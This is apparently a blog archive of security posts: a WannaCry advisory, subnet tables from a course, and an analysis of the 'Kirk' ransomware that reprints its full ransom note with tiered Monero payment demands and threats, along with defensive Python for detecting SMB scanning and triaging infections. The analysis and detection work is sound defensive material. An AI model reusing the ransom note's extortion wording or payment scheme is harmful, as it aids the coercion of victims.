Tag Archives: Science

WannaCry a Birthday Gift??

I woke up on the 12th of May, which was my birthday, looked at the news feed and saw a burst of articles regarding the WannaCry ransomware that has swept across the globe.

In the last few days, a new type of malware called WannaCrypt has done worldwide damage. It combines the characteristics of ransomware and a worm, and has hit many machines belonging to enterprises and government organizations around the world:


While most attention around this attack has focused on the vulnerabilities in Microsoft Windows XP, please note the following:

  • The attack works on all versions of Windows that have not been patched since the March patch release!
  • The malware can only exploit these vulnerabilities once it is already on the network. There are reports that it is being spread via email phishing or malicious websites, but these reports remain unconfirmed.


Please take the following actions immediately:

  • Make sure all systems on your network are fully patched, particularly servers.
  • As a precaution, ask all colleagues at your location to be very careful about opening email attachments and to minimise web browsing while this attack is ongoing.


The vulnerabilities are fixed by the Microsoft security patches listed below, which were released in March 2017; please ensure you have patched your systems:


Details of the malware can be found below. The worm scans TCP port 445, the Windows SMB file-sharing service:
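As an added illustration of the scanning behaviour just described (example code, not part of the original post): a simple detection that flags internal hosts reaching many distinct peers on TCP/445 within a short window, run over a constructed firewall-style log. The log format (timestamp, source, destination, destination port) and the addresses are assumptions made for the demo.

```python
from collections import defaultdict
from datetime import datetime, timedelta

SMB_PORT = 445


def _constructed_log():
    """Build a small firewall-style log (ts src dst dport), purely for the demo."""
    base = datetime(2017, 5, 12, 9, 0, 0)
    rows = []
    # Worm-like fan-out: one host touches 30 distinct peers on 445 within 30 s.
    for i in range(1, 31):
        rows.append(f"{(base + timedelta(seconds=i)).isoformat()} 10.0.5.17 10.0.5.{i} {SMB_PORT}")
    # Ordinary file-share use: a single connection to one server.
    rows.append(f"{(base + timedelta(seconds=5)).isoformat()} 10.0.5.40 10.0.5.50 {SMB_PORT}")
    # Web traffic on another port: ignored by the rule.
    rows.append(f"{(base + timedelta(seconds=6)).isoformat()} 10.0.5.41 10.0.5.50 80")
    # Admin workstation reaching 15 servers on 445 over 3 hours: high total, low rate.
    for i in range(15):
        rows.append(f"{(base + timedelta(minutes=12 * i)).isoformat()} 10.0.5.42 10.0.6.{i + 1} {SMB_PORT}")
    return "\n".join(rows)


SAMPLE_LOG = _constructed_log()


def parse_line(line):
    """Split one constructed record into (timestamp, src, dst, dport)."""
    ts, src, dst, dport = line.split()
    return datetime.fromisoformat(ts), src, dst, int(dport)


def smb_scanners(log_text, window=timedelta(seconds=60), threshold=10):
    """Return {src: peak_distinct_destinations} for every source that reached more
    than `threshold` distinct hosts on TCP/445 inside any `window`-long period.
    A host with many SMB peers spread over hours is not flagged; a burst is."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, dport = parse_line(line)
        if dport == SMB_PORT:
            events[src].append((ts, dst))
    hits = {}
    for src, evs in events.items():
        evs.sort()
        lo = 0
        for hi in range(len(evs)):
            # Slide the window so evs[lo..hi] all fall within `window` of evs[hi].
            while evs[hi][0] - evs[lo][0] > window:
                lo += 1
            distinct = len({dst for _, dst in evs[lo:hi + 1]})
            if distinct > threshold:
                hits[src] = max(hits.get(src, 0), distinct)
    return hits


if __name__ == "__main__":
    for src, n in smb_scanners(SAMPLE_LOG).items():
        print(f"possible SMB scanner {src}: {n} distinct TCP/445 targets within 60 s")
```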


Preliminary study shows that our environment is not infected, based on all hashes and domains found:




MD5 hash:



Per Symantec, here is a full list of the filetypes that are targeted and encrypted by WannaCry:

  • .123
  • .3dm
  • .3ds
  • .3g2
  • .3gp
  • .602
  • .7z
  • .ARC
  • .PAQ
  • .accdb
  • .aes
  • .ai
  • .asc
  • .asf
  • .asm
  • .asp
  • .avi
  • .backup
  • .bak
  • .bat
  • .bmp
  • .brd
  • .bz2
  • .cgm
  • .class
  • .cmd
  • .cpp
  • .crt
  • .cs
  • .csr
  • .csv
  • .db
  • .dbf
  • .dch
  • .der
  • .dif
  • .dip
  • .djvu
  • .doc
  • .docb
  • .docm
  • .docx
  • .dot
  • .dotm
  • .dotx
  • .dwg
  • .edb
  • .eml
  • .fla
  • .flv
  • .frm
  • .gif
  • .gpg
  • .gz
  • .hwp
  • .ibd
  • .iso
  • .jar
  • .java
  • .jpeg
  • .jpg
  • .js
  • .jsp
  • .key
  • .lay
  • .lay6
  • .ldf
  • .m3u
  • .m4u
  • .max
  • .mdb
  • .mdf
  • .mid
  • .mkv
  • .mml
  • .mov
  • .mp3
  • .mp4
  • .mpeg
  • .mpg
  • .msg
  • .myd
  • .myi
  • .nef
  • .odb
  • .odg
  • .odp
  • .ods
  • .odt
  • .onetoc2
  • .ost
  • .otg
  • .otp
  • .ots
  • .ott
  • .p12
  • .pas
  • .pdf
  • .pem
  • .pfx
  • .php
  • .pl
  • .png
  • .pot
  • .potm
  • .potx
  • .ppam
  • .pps
  • .ppsm
  • .ppsx
  • .ppt
  • .pptm
  • .pptx
  • .ps1
  • .psd
  • .pst
  • .rar
  • .raw
  • .rb
  • .rtf
  • .sch
  • .sh
  • .sldm
  • .sldx
  • .slk
  • .sln
  • .snt
  • .sql
  • .sqlite3
  • .sqlitedb
  • .stc
  • .std
  • .sti
  • .stw
  • .suo
  • .svg
  • .swf
  • .sxc
  • .sxd
  • .sxi
  • .sxm
  • .sxw
  • .tar
  • .tbk
  • .tgz
  • .tif
  • .tiff
  • .txt
  • .uop
  • .uot
  • .vb
  • .vbs
  • .vcd
  • .vdi
  • .vmdk
  • .vmx
  • .vob
  • .vsd
  • .vsdx
  • .wav
  • .wb2
  • .wk1
  • .wks
  • .wma
  • .wmv
  • .xlc
  • .xlm
  • .xls
  • .xlsb
  • .xlsm
  • .xlsx
  • .xlt
  • .xltm
  • .xltx
  • .xlw
  • .zip

As you can see, the ransomware covers nearly every important file type a user might have on his or her computer. It also drops a text file on the user’s desktop with the following ransom note:



Additional Resources for Week 3 RITx: CYBER501x Cybersecurity Fundamentals

Kerckhoffs’ Principle


This video explains how the RSA public and private keys are generated so that they are mathematically dependent on each other. The first part of the video explains the concepts with paint and colors; the second part contains the heavy-duty math, which may not be as easy to follow:


These links detail the Heartbleed bug from 2014. This vulnerability shows that even when data is encrypted both in transit and at rest, data being processed is not protected: encrypted data must be decrypted before it is processed, and it is exposed at that stage.


Week 3 Additional Resources

Netmask Translation Table

This is a Netmask Translation Table. It can be used to determine which IPs in a block can be used and which cannot.

Netmask            CIDR   Notes
==================================================
255.255.255.255    /32    Host (single address)
255.255.255.254    /31    Unusable
255.255.255.252    /30    4 IPs with 2 Usable
255.255.255.248    /29    8 IPs with 6 Usable
255.255.255.240    /28    16 IPs with 14 Usable
255.255.255.224    /27    32 IPs with 30 Usable
255.255.255.192    /26    64 IPs with 62 Usable
255.255.255.128    /25    128 IPs with 126 Usable
255.255.255.0      /24    256 IPs with 254 Usable ("Class C")

Note: The first and last IP of a range are NOT usable, and the first usable IP is normally assigned to the router.
The first IP is the network address; the last IP is the broadcast address.

Each customer will be given their own unique IP block, which is needed to configure their network. This IP information will be supplied by their Account Manager.

The following is only an EXAMPLE; do NOT use its IPs. Instead, use the IP numbers supplied by your Account Manager.

Your Account Manager should give you all the following information.

Dear Customer:

Your IP block is

Gateway IP address (Router IP)
Usable IPs
Subnet Mask

DNS Servers:    ns.cais.com

Subnetmask Translation Table

This is the same translation table, extended to all prefix lengths and with each mask also shown in binary. It can be used to determine which IPs in a block can be used and which cannot.

Subnetmask         Subnetmask (binary)                   CIDR   Notes
==========================================================================================
255.255.255.255    11111111.11111111.11111111.11111111   /32    Host (single address)
255.255.255.254    11111111.11111111.11111111.11111110   /31    Unusable
255.255.255.252    11111111.11111111.11111111.11111100   /30    4 IPs with 2 Usable
255.255.255.248    11111111.11111111.11111111.11111000   /29    8 IPs with 6 Usable
255.255.255.240    11111111.11111111.11111111.11110000   /28    16 IPs with 14 Usable
255.255.255.224    11111111.11111111.11111111.11100000   /27    32 IPs with 30 Usable
255.255.255.192    11111111.11111111.11111111.11000000   /26    64 IPs with 62 Usable
255.255.255.128    11111111.11111111.11111111.10000000   /25    128 IPs with 126 Usable
255.255.255.0      11111111.11111111.11111111.00000000   /24    256 IPs with 254 Usable ("Class C")
255.255.254.0      11111111.11111111.11111110.00000000   /23
255.255.252.0      11111111.11111111.11111100.00000000   /22
255.255.248.0      11111111.11111111.11111000.00000000   /21
255.255.240.0      11111111.11111111.11110000.00000000   /20
255.255.224.0      11111111.11111111.11100000.00000000   /19
255.255.192.0      11111111.11111111.11000000.00000000   /18
255.255.128.0      11111111.11111111.10000000.00000000   /17
255.255.0.0        11111111.11111111.00000000.00000000   /16    "Class B"
255.254.0.0        11111111.11111110.00000000.00000000   /15
255.252.0.0        11111111.11111100.00000000.00000000   /14
255.248.0.0        11111111.11111000.00000000.00000000   /13
255.240.0.0        11111111.11110000.00000000.00000000   /12
255.224.0.0        11111111.11100000.00000000.00000000   /11
255.192.0.0        11111111.11000000.00000000.00000000   /10
255.128.0.0        11111111.10000000.00000000.00000000   /9
255.0.0.0          11111111.00000000.00000000.00000000   /8     "Class A"
254.0.0.0          11111110.00000000.00000000.00000000   /7
252.0.0.0          11111100.00000000.00000000.00000000   /6
248.0.0.0          11111000.00000000.00000000.00000000   /5
240.0.0.0          11110000.00000000.00000000.00000000   /4
224.0.0.0          11100000.00000000.00000000.00000000   /3
192.0.0.0          11000000.00000000.00000000.00000000   /2
128.0.0.0          10000000.00000000.00000000.00000000   /1
0.0.0.0            00000000.00000000.00000000.00000000   /0     "IP space" (entire address space)

Note: The first and last IP of a range are NOT usable, and the first usable IP is normally assigned to the router.
The first IP is the network address; the last IP is the broadcast address.
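The table's arithmetic, as an added worked example that is not part of the course notes: Python's standard `ipaddress` module reproduces each row, plans a concrete block (network, broadcast, router as first usable, usable range) and checks whether a given address may be assigned to a host. The block it plans is a constructed one from the RFC 5737 documentation range, standing in for the values an Account Manager would supply.

```python
import ipaddress


def mask_row(prefix):
    """One row of the translation table for a /prefix (0..32)."""
    net = ipaddress.IPv4Network(f"0.0.0.0/{prefix}")
    mask = net.netmask
    binary = ".".join(f"{octet:08b}" for octet in mask.packed)
    total = net.num_addresses
    if prefix == 32:
        usable, note = 1, "Host (single address)"
    elif prefix == 31:
        usable, note = 0, "Unusable"            # as the table states
    else:
        usable = total - 2                       # minus network and broadcast
        note = f"{total} IPs with {usable} Usable"
    return {"mask": str(mask), "binary": binary, "cidr": f"/{prefix}",
            "total": total, "usable": usable, "note": note}


def translation_table(lo=24, hi=32):
    """Rows from /hi down to /lo, in the order the table above lists them."""
    return [mask_row(p) for p in range(hi, lo - 1, -1)]


def block_plan(cidr):
    """Network, broadcast, router (first usable) and usable range for a block."""
    net = ipaddress.IPv4Network(cidr, strict=False)   # a host address inside the block is accepted too
    if net.prefixlen > 30:
        raise ValueError(f"{cidr}: no usable host range for /31 or /32")
    first = net.network_address + 1
    last = net.broadcast_address - 1
    return {"network": str(net.network_address),
            "broadcast": str(net.broadcast_address),
            "gateway": str(first),                       # first usable, normally the router
            "usable": (str(first), str(last)),
            "usable_count": net.num_addresses - 2,
            "mask": str(net.netmask)}


def is_usable_host(ip, cidr):
    """True if `ip` may be assigned to a host in `cidr` (inside the block, and
    neither the network nor the broadcast address)."""
    net = ipaddress.IPv4Network(cidr, strict=False)
    addr = ipaddress.IPv4Address(ip)
    return (net.prefixlen <= 30 and addr in net
            and addr not in (net.network_address, net.broadcast_address))


if __name__ == "__main__":
    print(f"{'Netmask':<17}{'Binary':<37}{'CIDR':<6}Notes")
    for r in translation_table():
        print(f"{r['mask']:<17}{r['binary']:<37}{r['cidr']:<6}{r['note']}")
    # Constructed example block from the RFC 5737 documentation range.
    print(block_plan("192.0.2.0/28"))
```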

Star Trek – Ransomware Brings us Monero and a Spock Decryptor!

Boldly going where no man has gone before, the Kirk Ransomware brings so much nerdy goodness to the table that it could make anyone in IT interested. We have Star Trek, Low Orbital Ion Cannons, a cryptocurrency payment other than Bitcoin, and a decryptor named Spock! Need I say more?

Discovered today by Avast malware researcher Jakub Kroustek, the Kirk Ransomware is written in Python and may be the first ransomware to utilize Monero as the ransom payment of choice.

Kirk Ransomware

At this time there are no known victims of this ransomware and it does not appear to be decryptable. For those who want to discuss this ransomware or receive updates about it, they can subscribe to our Kirk Ransomware Support & Help topic.

Kirk Ransomware uses Monero for Ransom Payments

Ever since Monero was released, it has been highly touted as a more secure and anonymous payment system than Bitcoin. This has led underground criminal sites, like AlphaBay, to accept it as payment and criminals to mine it using mining Trojans. It was only a matter of time until ransomware developers started requesting it.

For possibly the first time, with the release of Kirk Ransomware, Monero has been introduced as a ransom payment. The problem is that this is only going to confuse victims even more. Even with Bitcoin becoming more widely accepted, it is still not easy to acquire. By introducing a new cryptocurrency into the mix, victims are just going to become more confused, making paying ransoms even more difficult.

How the Kirk Ransomware Encrypts a Computer

While it is not currently known how the Kirk Ransomware is being distributed, we do know that it masquerades as the network stress tool called Low Orbital Ion Cannon. Currently named loic_win32.exe, when executed Kirk Ransomware generates an AES password that is used to encrypt the victim’s files. This AES key is then encrypted with an embedded RSA-4096 public key and saved in a file called pwd in the same directory as the ransomware executable.

If you plan on paying the ransom for the Kirk Ransomware, you must not delete the pwd file, as it contains an encrypted version of your decryption key. Only the ransomware developer can decrypt this file, and a victim who wishes to pay the ransom will be required to send it to them.

Below is the current embedded RSA public key used to encrypt the victim’s encryption key.


Kirk Ransomware will now display a message box that displays the same slogan as the LOIC network stress tool. This slogan is: “Low Orbital Ion Cannon | When harpoons, air strikes and nukes fail | v1.0.1.0”.

Fake Low Orbital Ion Cannon Alert

At this point, the ransomware begins to scan the C: drive for files with certain extensions. At the time of this writing, Kirk Ransomware targets 625 file types, which are listed at the end of the article.

If a matching file is detected, it will encrypt it using the previously created AES encryption key and then append the .kirked extension to the encrypted file’s name. For example, a file called test.jpg would be encrypted and renamed to test.jpg.kirked.

When the ransomware finishes encrypting the files, it drops a ransom note called RANSOM_NOTE.txt in the same folder as the executable. It also displays the ransom note in a window on the desktop. A full version of the ransom note can be seen at the end of the article.

This ransom note tells the victim that they must purchase ~1,100 worth of the Monero currency and send it to the enclosed Monero address. Once a payment is made, the victim must email the pwd file and the payment transaction ID to the kirk.help@scryptmail.com or kirk.payments@scryptmail.com email addresses to receive the decryptor.
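An added responder-side example, not code from the article or from the malware itself: a triage routine that finds the artefacts the article names (files with the appended `.kirked` extension, the `pwd` file holding the RSA-encrypted AES key, the RANSOM_NOTE.txt drop, and any executable matching the SHA256 listed below) and preserves a copy of the `pwd` file, since losing it forecloses any later decryption. The directory tree it scans is constructed in the block purely for demonstration.

```python
import hashlib
import os
import shutil
import tempfile

# SHA256 of the loic_win32.exe sample, as listed in the article.
KIRK_SAMPLE_SHA256 = "39a2201a88f10d81b220c973737f0becedab2e73426ab9923880fb0fb990c5cc"
ENCRYPTED_EXT = ".kirked"
KEY_FILE = "pwd"
NOTE_FILE = "RANSOM_NOTE.txt"


def sha256_of(path):
    """Stream a file through SHA256 (large files are read in chunks)."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def triage(root):
    """Walk `root` and collect what a responder needs to record and preserve."""
    found = {"encrypted": [], "original_names": [], "key_files": [],
             "notes": [], "sample_matches": []}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if name.endswith(ENCRYPTED_EXT):
                found["encrypted"].append(path)
                # test.jpg.kirked -> test.jpg: the original name survives the rename
                found["original_names"].append(name[:-len(ENCRYPTED_EXT)])
            elif name == KEY_FILE:
                found["key_files"].append(path)
            elif name == NOTE_FILE:
                found["notes"].append(path)
            elif name.lower().endswith(".exe") and sha256_of(path) == KIRK_SAMPLE_SHA256:
                found["sample_matches"].append(path)
    return found


def preserve_key_files(found, evidence_dir):
    """Copy every pwd file into `evidence_dir` (metadata preserved) and return
    the copies; the hash suffix keeps copies from different hosts distinct."""
    os.makedirs(evidence_dir, exist_ok=True)
    copied = []
    for i, src in enumerate(found["key_files"]):
        dst = os.path.join(evidence_dir, f"pwd_{i}_{sha256_of(src)[:12]}")
        shutil.copy2(src, dst)
        copied.append(dst)
    return copied


def build_sample_tree():
    """Constructed layout mimicking the article's description; returns its root.
    The .exe here is a stand-in and does NOT hash to the real sample."""
    root = tempfile.mkdtemp(prefix="kirk_triage_")
    docs = os.path.join(root, "docs")
    os.makedirs(docs)
    sample_files = {
        os.path.join(docs, "test.jpg.kirked"): b"\x00" * 16,
        os.path.join(docs, "report.docx.kirked"): b"\x01" * 16,
        os.path.join(docs, "readme.md"): b"untouched",
        os.path.join(root, "loic_win32.exe"): b"MZ-not-the-real-sample",
        os.path.join(root, KEY_FILE): b"\x02" * 512,   # would be the RSA-encrypted AES key
        os.path.join(root, NOTE_FILE): b"Oh no! The Kirk ransomware has encrypted your files!",
    }
    for path, data in sample_files.items():
        with open(path, "wb") as f:
            f.write(data)
    return root


if __name__ == "__main__":
    tree = build_sample_tree()
    result = triage(tree)
    print(f"{len(result['encrypted'])} encrypted files, {len(result['key_files'])} pwd file(s), "
          f"{len(result['notes'])} note(s), sample match: {bool(result['sample_matches'])}")
    print("preserved:", preserve_key_files(result, os.path.join(tree, "evidence")))
```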

The Spock Decryptor

This wouldn’t be a Star Trek themed ransomware without Spock. The developer agrees, as they have named the decryptor “Spock”, and it will be supplied to the victim once a payment is made.

The Spock Decryptor

At this time we have not seen a sample of the decryptor, so cannot provide more info regarding it.

As previously said, unfortunately at this time the ransomware does not look like it can be decrypted. For those who want to discuss this ransomware or receive updates about it, they can subscribe to our Kirk Ransomware Support & Help topic.



Files associated with the Kirk Ransomware:



SHA256: 39a2201a88f10d81b220c973737f0becedab2e73426ab9923880fb0fb990c5cc

Targeted File Extensions:

.cfr,  .ytd,  .sngw,  .tst,  .skudef,  .dem,  .sims3pack,  .hbr,  .hkx,  .rgt,  .ggpk,  .ttarch2,  .hogg,  .spv,  .bm2,  .lua,  .dff,  .save,  .rgssad,  .scm,  .aud,  .rxdata,  .mcmeta,  .bin,  .mpqe,  .rez,  .xbe,  .grle,  .bf,  .iwd,  .vpp_pc,  .scb,  .naz,  .m2,  .xpk,  .sabs,  .nfs13save,  .gro,  .emi,  .wad,  .15,  .vfs,  .drs,  .taf,  .m4s,  .player,  .umv,  .sgm,  .ntl,  .esm,  .qvm,  .arch00,  .tir,  .bk,  .sabl,  .bin,  .opk,  .vfs0,  .xp3,  .tobj,  .rcf,  .sga,  .esf,  .rpack,  .DayZProfile,  .qsv,  .gam,  .bndl,  .u2car,  .psk,  .gob,  .lrf,  .lts,  .iqm,  .i3d,  .acm,  .SC2Replay,  .xfbin,  .db0,  .fsh,  .dsb,  .cry,  .osr,  .gcv,  .blk,  .4,  .lzc,  .umod,  .w3x,  .mwm,  .crf,  .tad,  .pbn,  .14,  .ppe,  .ydc,  .fmf,  .swe,  .nfs11save,  .tgx,  .trf,  .atlas,  .20,  .game,  .rw,  .rvproj2,  .sc1,  .ed,  .lsd,  .pkz,  .rim,  .bff,  .gct,  .9,  .fpk,  .pk3,  .osf,  .bns,  .cas,  .lfl,  .rbz,  .sex,  .mrm,  .mca,  .hsv,  .vpt,  .pff,  .i3chr,  .tor,  .01,  .utx,  .kf,  .dzip,  .fxcb,  .modpak,  .ydr,  .frd,  .bmd,  .vpp,  .gcm,  .frw,  .baf,  .edf,  .w3g,  .mtf,  .tfc,  .lpr,  .pk2,  .cs2,  .fps,  .osz,  .lnc,  .jpz,  .tinyid,  .ebm,  .i3exec,  .ert,  .sv4,  .cbf,  .oppc,  .enc,  .rmv,  .mta,  .otd,  .pk7,  .gm,  .cdp,  .cmg,  .ubi,  .hpk,  .plr,  .mis,  .ids,  .replay_last_battle,  .z2f,  .map,  .ut4mod,  .dm_1,  .p3d,  .tre,  .package,  .streamed,  .l2r,  .xbf,  .wep,  .evd,  .dxt,  .bba,  .profile,  .vmt,  .rpf,  .ucs,  .lab,  .cow,  .ibf,  .tew,  .bix,  .uhtm,  .txd,  .jam,  .ugd,  .13,  .dc6,  .vdk,  .bar,  .cvm,  .wso,  .xxx,  .zar,  .anm,  .6,  .ant,  .ctp,  .sv5,  .dnf,  .he0,  .mve,  .emz,  .e4mod,  .gxt,  .bag,  .arz,  .tbi,  .itp,  .i3animpack,  .vtf,  .afl,  .ncs,  .gaf,  .ccw,  .tsr,  .bank,  .lec,  .pk4,  .psv,  .los,  .civ5save,  .rlv,  .nh,  .sco,  .ims,  .epc,  .rgm,  .res,  .wld,  .sve,  .db1,  .dazip,  .vcm,  .rvm,  .eur,  .me2headmorph,  .azp,  .ags,  .12,  .slh,  .cha,  .wowsreplay,  .dor,  .ibi,  .bnd,  .zse,  .ddsx,  .mcworld,  
.intr,  .vdf,  .mtr,  .addr,  .blp,  .mlx,  .d2i,  .21,  .tlk,  .gm1,  .n2pk,  .ekx,  .tas,  .rav,  .ttg,  .spawn,  .osu,  .oac,  .bod,  .dcz,  .mgx,  .wowpreplay,  .fuk,  .kto,  .fda,  .vob,  .ahc,  .rrs,  .ala,  .mao,  .udk,  .jit,  .25,  .swar,  .nav,  .bot,  .jdf,  .32,  .mul,  .szs,  .gax,  .xmg,  .udm,  .zdk,  .dcc,  .blb,  .wxd,  .isb,  .pt2,  .utc,  .card,  .lug,  .JQ3SaveGame,  .osk,  .nut,  .unity,  .cme,  .elu,  .db7,  .hlk,  .ds1,  .wx,  .bsm,  .w3z,  .itm,  .clz,  .zfs,  .3do,  .pac,  .dbi,  .alo,  .gla,  .yrm,  .fomod,  .ees,  .erp,  .dl,  .bmd,  .pud,  .ibt,  .24,  .wai,  .sww,  .opq,  .gtf,  .bnt,  .ngn,  .tit,  .wf,  .bnk,  .ttz,  .nif,  .ghb,  .la0,  .bun,  .11,  .icd,  .z3,  .djs,  .mog,  .2da,  .imc,  .sgh,  .db9,  .42,  .vis,  .whd,  .pcc,  .43,  .ldw,  .age3yrec,  .pcpack,  .ddt,  .cok,  .xcr,  .bsp,  .yaf,  .swd,  .tfil,  .lsd,  .blorb,  .unr,  .mob,  .fos,  .cem,  .material,  .lfd,  .hmi,  .md4,  .dog,  .256,  .eix,  .oob,  .cpx,  .cdata,  .hak,  .phz,  .stormreplay,  .lrn,  .spidersolitairesave-ms,  .anm,  .til,  .lta,  .sims2pack,  .md2,  .pkx,  .sns,  .pat,  .tdf,  .cm,  .mine,  .rbn,  .uc,  .asg,  .raf,  .myp,  .mys,  .tex,  .cpn,  .flmod,  .model,  .sfar,  .fbrb,  .sav2,  .lmg,  .tbc,  .xpd,  .bundledmesh,  .bmg,  .18,  .gsc,  .shader_bundle,  .drl,  .world,  .rwd,  .rwv,  .rda,  .3g2,  .3gp,  .asf,  .asx,  .avi,  .flv,  .ai,  .m2ts,  .mkv,  .mov,  .mp4,  .mpg,  .mpeg,  .mpeg4,  .rm,  .swf,  .vob,  .wmv,  .doc,  .docx,  .pdf,  .rar,  .jpg,  .jpeg,  .png,  .tiff,  .zip,  .7z,  .dif.z,  .exe,  .tar.gz,  .tar,  .mp3,  .sh,  .c,  .cpp,  .h,  .mov,  .gif,  .txt,  .py,  .pyc,  .jar,  .csv,  .psd,  .wav,  .ogg,  .wma,  .aif,  .mpa,  .wpl,  .arj,  .deb,  .pkg,  .db,  .dbf,  .sav,  .xml,  .html,  .aiml,  .apk,  .bat,  .bin,  .cgi,  .pl,  .com,  .wsf,  .bmp,  .bmp,  .gif,  .tif,  .tiff,  .htm,  .js,  .jsp,  .php,  .xhtml,  .cfm,  .rss,  .key,  .odp,  .pps,  .ppt,  .pptx,  .class,  .cd,  .java,  .swift,  .vb,  .ods,  .xlr,  .xls,  .xlsx,  .dot,  
.docm,  .dotx,  .dotm,  .wpd,  .wps,  .rtf,  .sdw,  .sgl,  .vor,  .uot,  .uof,  .jtd,  .jtt,  .hwp,  .602,  .pdb,  .psw,  .xlw,  .xlt,  .xlsm,  .xltx,  .xltm,  .xlsb,  .wk1,  .wks,  .123,  .sdc,  .slk,  .pxl,  .wb2,  .pot,  .pptm,  .potx,  .potm,  .sda,  .sdd,  .sdp,  .cgm,  .wotreplay,  .rofl,  .pak,  .big,  .bik,  .xtbl,  .unity3d,  .capx,  .ttarch,  .iwi,  .rgss3a,  .gblorb,  .xwm,  .j2e,  .mpk,  .xex,  .tiger,  .lbf,  .cab,  .rx3,  .epk,  .vol,  .asset,  .forge,  .lng,  .sii,  .litemod,  .vef,  .dat,  .papa,  .psark,  .ydk,  .mpq,  .wtf,  .bsa,  .re4,  .dds,  .ff,  .yrp,  .pck,  .t3,  .ltx,  .uasset,  .bikey,  .patch,  .upk,  .uax,  .mdl,  .lvl,  .qst,  .ddv,  .pta

Ransom Note Text:

      _  _____ ____  _  __   ____      _    _   _ ____   ___  __  ____        ___    ____  _____ 
     | |/ /_ _|  _ \| |/ /  |  _ \    / \  | \ | / ___| / _ \|  \/  \ \      / / \  |  _ \| ____|
     | ' / | || |_) | ' /   | |_) |  / _ \ |  \| \___ \| | | | |\/| |\ \ /\ / / _ \ | |_) |  _|  
     | . \ | ||  _ <| . \   |  _ <  / ___ \| |\  |___) | |_| | |  | | \ V  V / ___ \|  _ <| |___ 
     |_|\_\___|_| \_\_|\_\  |_| \_\/_/   \_\_| \_|____/ \___/|_|  |_|  \_/\_/_/   \_\_| \_\_____|

Oh no! The Kirk ransomware has encrypted your files!



Your computer has fallen victim to the Kirk malware and important files have been encrypted - locked
up so they don't work. This may have broken some software, including games, office suites etc.

Here's a list of some the file extensions that were targetted:

    .3g2      .rar      .jar      .cgi      .class    .jtd      .potx     .xex      .dds      
    .3gp      .jpg      .csv      .pl       .cd       .jtt      .potm     .tiger    .ff       
    .asf      .jpeg     .psd      .com      .java     .hwp      .sda      .lbf      .yrp      
    .asx      .png      .wav      .wsf      .swift    .602      .sdd      .cab      .pck      
    .avi      .tiff     .ogg      .bmp      .vb       .pdb      .sdp      .rx3      .t3       
    .flv      .zip      .wma      .bmp      .ods      .psw      .cgm      .epk      .ltx      
    .ai       .7z       .aif      .gif      .xlr      .xlw      .wotreplay.vol      .uasset   
    .m2ts     .dif.z    .mpa      .tif      .xls      .xlt      .rofl     .asset    .bikey    
    .mkv      .exe      .wpl      .tiff     .xlsx     .xlsm     .pak      .forge    .patch    
    .mov      .tar.gz   .arj      .htm      .dot      .xltx     .big      .lng      .upk      
    .mp4      .tar      .deb      .js       .docm     .xltm     .bik      .sii      .uax      
    .mpg      .mp3      .pkg      .jsp      .dotx     .xlsb     .xtbl     .litemod  .mdl      
    .mpeg     .sh       .db       .php      .dotm     .wk1      .unity3d  .vef      .lvl      
    mpeg4     .c        .dbf      .xhtml    .wpd      .wks      .capx     .dat      .qst      
    .rm       .cpp      .sav      .cfm      .wps      .123      .ttarch   .papa     .ddv      
    .swf      .h        .xml      .rss      .rtf      .sdc      .iwi      .psark    .pta      
    .vob      .mov      .html     .key      .sdw      .slk      .rgss3a   .ydk                
    .wmv      .gif      .aiml     .odp      .sgl      .pxl      .gblorb   .mpq                
    .doc      .txt      .apk      .pps      .vor      .wb2      .xwm      .wtf                
    .docx     .py       .bat      .ppt      .uot      .pot      .j2e      .bsa                
    .pdf      .pyc      .bin      .pptx     .uof      .pptm     .mpk      .re4                

There are an additional 441 file extensions that are targetted. They are mostly to do with games.

To get your files back, you need to pay. Now. Payments recieved more than 48 hours after the time of
infection will be charged double. Further time penalties are listed below. The time of infection has
been logged.

Any files with the extensions listed above will now have the extra extension '.kirked', these files
are encrypted using military grade encryption.

In the place you ran this program from, you should find a note (named RANSOM_NOTE.txt) similar to this one.
You will also find a file named 'pwd' - this is your encrypted password file. Although it was
generated by your computer, you have no way of ever decrypting it. This is due to the security
of both the way it was generated and the way it was encrypted. Your files were encrypted using
this password.

 ____  ____   ___   ____ _  __   _____ ___     _____ _   _ _____    ____  _____ ____   ____ _   _ _____ _ 
/ ___||  _ \ / _ \ / ___| |/ /  |_   _/ _ \   |_   _| | | | ____|  |  _ \| ____/ ___| / ___| | | | ____| |
\___ \| |_) | | | | |   | ' /     | || | | |    | | | |_| |  _|    | |_) |  _| \___ \| |   | | | |  _| | |
 ___) |  __/| |_| | |___| . \     | || |_| |    | | |  _  | |___   |  _ <| |___ ___) | |___| |_| | |___|_|
|____/|_|    \___/ \____|_|\_\    |_| \___/     |_| |_| |_|_____|  |_| \_\_____|____/ \____|\___/|_____(_)

  "Logic, motherfucker." ~ Spock.

Decrypting your files is easy. Take a deep breath and follow the steps below.

 1 ) Make the proper payment.
     Payments are made in Monero. This is a crypto-currency, like bitcoin.
     You can buy Monero, and send it, from the same places you can any other
     crypto-currency. If you're still unsure, google 'bitcoin exchange'.

     Sign up at one of these exchange sites and send the payment to the address below.

     Make note of the payment / transaction ID, or make one up if you have the option.

    Payment Address (Monero Wallet):

        Days   :  Monero  : Offer Expires
        0-2    :  50      : 03/18/17 15:32:14
        3-7    :  100     : 03/23/17 15:32:14
        8-14   :  200     : 03/30/17 15:32:14
        15-30  :  500     : 04/15/17 15:32:14

    Note: In 31 days your password decryption key gets permanently deleted.
          You then have no way to ever retrieve your files. So pay now.

 2 ) Email us.
     Send your pwd file as an email attachment to one of the email addresses below.
     Include the payment ID from step 1.

     Active email addresses:

 3 ) Decrypt your files.
     You will recieve your decrypted password file and a program called 'Spock'.
     Download these both to the same place and run Spock.
     Spock reads in your decrypted password file and uses it to decrypt all of the
     affected files on your computer.

     > IMPORTANT !
       The password is unique to this infection.
       Using an old password or one from another machine will result in corrupted files.
       Corrupted files cannot be retrieved.
       Don't fuck around.

 4 ) Breathe.

       _     _____     _______    _     ___  _   _  ____ 
      | |   |_ _\ \   / / ____|  | |   / _ \| \ | |/ ___|
      | |    | | \ \ / /|  _|    | |  | | | |  \| | |  _ 
      | |___ | |  \ V / | |___   | |__| |_| | |\  | |_| |
      |_____|___|  \_/  |_____|  |_____\___/|_| \_|\____|
